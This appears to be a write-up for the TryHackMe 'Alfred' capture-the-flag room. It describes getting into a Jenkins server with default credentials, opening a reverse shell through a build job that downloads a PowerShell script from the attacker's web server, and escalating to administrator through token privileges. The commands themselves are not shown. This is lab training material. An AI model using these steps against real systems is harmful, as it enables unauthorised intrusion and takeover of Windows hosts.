Alfred
https://tryhackme.com/room/alfred
User flag
Let's start with a nmap scan:
We see there are three open ports (80, 3389, 8080)
If we head to port 80 we'll find the following:
After a little enumeration on port 80 we found nothing really interesting so let's check port 8080.
We see a jenkins login page, we can try to brute force it. But first, let's try common/default credentials like admin:admin
It works! Now if we look around we can get a reverse shell configuring one of the existing projects: http://10.10.173.2:8080/job/project/1/configure
First we need to host a webserver to get the victim to download a Powershell script so we can create a reverse shell (The script: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).
Then introduce the following code on the description:
Let's save and apply. After that we'll select "Build now" (Don't forget to start a listener).
Bingo. We got a shell.
Grab the flag.
Root flag
Now that we have to find a way to gain root access. Let's start by checking our privileges.
We see that SeDebugPrivilege and SeImpersonatePrivilege are enabled. We can use incognito to exploit them. We're not using metasploit so we have to download it (https://github.com/milkdevil/incognito2)
We can use certutil.exe to transfer the binary to our victim machine
Now we have two options. We can impersonate the NT AUTHORITY SYSTEM token or we can create a new user with admin rights.
Let's try the first method:
When attempting to impersonate the admin token we see we have no option (Maybe it's because we are not using a meterpreter shell):
So let's try the second method:
Now we can login using a remote desk tool like rdesktop or remmina
Grab the flag.
Last updated